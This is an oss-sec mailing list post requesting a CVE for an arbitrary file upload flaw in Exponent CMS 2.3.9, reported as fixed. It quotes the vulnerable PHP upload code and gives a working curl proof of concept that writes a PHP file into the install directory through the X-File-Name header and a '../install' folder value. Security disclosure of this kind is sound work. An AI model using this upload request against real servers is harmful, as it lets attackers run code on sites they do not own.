oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request:Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php

From: Carl Peng <felixk3y () gmail com>
Date: Wed, 21 Sep 2016 08:10:39 +0800
Hi, I reported the following Arbitrary File Upload vulnerability to the
ExponentCMS team on Sep 13, 2016:
vulnerability:
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592
```
if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') &&
QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) {
            // prevent attempt to place file somewhere other than /files
folder
            if (!empty($this->params['folder']) &&
strpos($this->params['folder'], '..') !== false) {
                $ar = new expAjaxReply(300, gt("File was not uploaded!"));
                $ar->send();
            }
            if (SITE_FILE_MANAGER == 'picker') {
                $quikFolder = !empty($this->params['folder']) ?
$this->params['folder'] :QUICK_UPLOAD_FOLDER;
                $destDir = null;
            } elseif (SITE_FILE_MANAGER == 'elfinder') {
                $quikFolder = null;
                $destDir = UPLOAD_DIRECTORY_RELATIVE .
(!empty($this->params['folder']) ? $this->params['folder']
:QUICK_UPLOAD_FOLDER) . '/';
                // create folder if non-existant
                expFile::makeDirectory($destDir);
            }
        } else {
            $quikFolder = null;
            $destDir = null;
        }
        //extensive suitability check before doing anything with the file...
        if (isset($_SERVER['HTTP_X_FILE_NAME'])) {  //HTML5 XHR upload
            $file =
expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'],false,false,null,$destDir,intval(QUICK_UPLOAD_WIDTH));
 //here File Upload vulnerability
            $file->poster = $user->id;
```
the "folder"  and "$_SERVER['HTTP_X_FILE_NAME']", the two parameters may be
submitted by the user

expFile::fileXHRUpload():
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526
```
$_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile;
//"fileName" parameter may be submitted by the user
//...
$maxwidth = intval($_max_width);
if (!empty($maxwidth)) {
..///
} else {
    file_put_contents($_destFullPath, file_get_contents('php://input',
'r')); // line 572
}

Proof of concept:
curl -H "X-File-Name: e.php" -d
"controller=file&action=quickUpload&code=<?php
phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php

http://www.exponentcms.org/install/e.php


And Now, This  vulnerability have been fixed.
https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a

This issue was reported by Peng Hua of silence.com.cn Inc. and I would like
to request a CVE for this issue (if not done so).

Thank you.
---------------------------------http://www.silence.com.cn
penghua#silence.com.cn
PKAV Team
Previous By Date Next
Previous By Thread Next

Current thread: